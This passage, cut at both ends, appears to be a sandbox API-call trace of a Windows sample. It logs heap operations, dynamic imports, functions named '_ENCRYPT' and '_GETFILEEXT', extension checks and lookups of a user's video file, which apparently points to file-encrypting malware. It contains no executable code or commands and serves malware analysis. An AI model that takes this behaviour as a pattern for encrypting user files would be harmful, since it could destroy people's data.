Flags=0x0, Size=0x10) returned 0x9ba420 [0192.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0192.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0192.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0192.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0192.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0192.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0192.652] FreeLibrary (hLibModule=0x75990000) returned 1 [0192.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0192.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0192.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0192.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0192.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0192.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0192.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0192.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0192.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0192.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0192.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0192.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0192.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0192.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0192.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0192.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0192.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0192.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0192.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0192.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0192.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0192.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0192.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0192.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0192.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0192.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0192.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0192.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0192.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0192.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0192.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0192.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0192.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0192.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0192.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0192.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0192.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0192.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0192.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0192.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0192.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0192.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0192.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0192.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0192.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0192.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0192.654] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0192.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0192.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0192.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0192.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0192.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19d0 [0192.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0192.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0192.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0192.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0192.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0192.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0192.655] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0192.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0192.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0192.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0192.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0192.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0192.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0192.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0192.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0192.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0192.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0192.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0192.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0192.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0192.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0192.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0192.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0192.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0192.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0192.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0192.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0192.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0192.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0192.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0192.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0192.656] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0192.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0192.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0192.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0192.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0192.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0192.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0192.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0192.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0192.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0192.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0192.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0192.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0192.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0192.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0192.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0192.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0192.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0192.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0192.656] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0192.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0192.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0192.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0192.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8e8 [0192.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd8e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0192.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0192.657] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0192.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0192.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0192.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0192.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0192.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0192.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0192.657] CloseHandle (hObject=0x160) returned 1 [0192.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0192.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0192.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0192.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0192.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0192.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0192.658] FreeLibrary (hLibModule=0x75990000) returned 1 [0192.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0192.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0192.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0192.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0192.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0192.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0192.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0192.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0192.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0192.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0192.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0192.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0192.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0192.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0192.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0192.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0192.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0192.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0192.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0192.659] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0192.659] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0192.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0192.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0192.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0192.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0192.659] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0192.659] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0192.659] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.659] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0192.659] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0192.659] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0192.659] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0192.659] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0192.659] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0192.659] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.659] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.660] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.660] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\GwLjRbpo46x9NeDS.mkv", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2d108d0, ftCreationTime.dwHighDateTime=0x1d5e51b, ftLastAccessTime.dwLowDateTime=0x4261b480, ftLastAccessTime.dwHighDateTime=0x1d5da61, ftLastWriteTime.dwLowDateTime=0x4261b480, ftLastWriteTime.dwHighDateTime=0x1d5da61, nFileSizeHigh=0x0, nFileSizeLow=0x8fd6, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="GwLjRbpo46x9NeDS.mkv", cAlternateFileName="GWLJRB~1.MKV")) returned 0x90add8 [0192.660] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0192.660] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.660] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\GwLjRbpo46x9NeDS.mkv", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2d108d0, ftCreationTime.dwHighDateTime=0x1d5e51b, ftLastAccessTime.dwLowDateTime=0x4261b480, ftLastAccessTime.dwHighDateTime=0x1d5da61, ftLastWriteTime.dwLowDateTime=0x4261b480, ftLastWriteTime.dwHighDateTime=0x1d5da61, nFileSizeHigh=0x0, nFileSizeLow=0x8fd6, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="GwLjRbpo46x9NeDS.mkv", cAlternateFileName="GWLJRB~1.MKV")) returned 0x90add8 [0192.660] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0192.660] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.661] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\GwLjRbpo46x9NeDS.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.661] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\GwLjRbpo46x9NeDS.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.661] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\GwLjRbpo46x9NeDS.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.661] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\GwLjRbpo46x9NeDS.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.661] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\GwLjRbpo46x9NeDS.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.661] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\GwLjRbpo46x9NeDS.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.661] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\GwLjRbpo46x9NeDS.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.661] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\GwLjRbpo46x9NeDS.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.661] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\GwLjRbpo46x9NeDS.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.661] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\GwLjRbpo46x9NeDS.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.661] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\GwLjRbpo46x9NeDS.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.661] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\GwLjRbpo46x9NeDS.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.661] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\GwLjRbpo46x9NeDS.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.661] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\GwLjRbpo46x9NeDS.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.661] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\GwLjRbpo46x9NeDS.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.661] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\GwLjRbpo46x9NeDS.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.661] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\GwLjRbpo46x9NeDS.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.661] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\GwLjRbpo46x9NeDS.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.661] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\GwLjRbpo46x9NeDS.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.661] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\GwLjRbpo46x9NeDS.mkv\"", cchCount1=10, 